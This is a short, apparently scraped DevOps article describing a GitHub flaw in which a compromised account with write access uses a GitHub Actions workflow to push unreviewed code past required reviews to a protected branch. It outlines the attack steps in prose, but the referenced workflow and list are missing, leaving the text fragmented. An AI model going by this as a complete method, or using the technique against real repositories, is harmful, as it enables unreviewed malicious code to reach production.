DevOps Articles

Bypassing required reviews using GitHub Actions

A newly discovered security flaw in GitHub allows leveraging GitHub Actions to bypass the required reviews mechanism and push unreviewed code to a protected branch, potentially allowing malicious code to be used by other users or flow down the pipeline to production. Write permissions are commonly granted to many users, as that is the base permission needed to directly push code to a repo. As GitHub organization owners are aware of the constant need to protect their code against different types of threats, one attack vector that is always of great concern is that of a compromised user account.

One such tool is GitHub Actions — GitHub’s CI service — which is used to build, test, and deploy GitHub code by building and running workflows from development to production systems.

So, what does a typical GitHub organization look like?It generally has: Practically, this means an attacker that hijacks a user account and wants to push code to a protected branch, can simply push their malicious code to a new remote branch, along with a workflow with the following content: Then, the attacker creates a pull request, with the intent to merge their malicious code to a protected branch.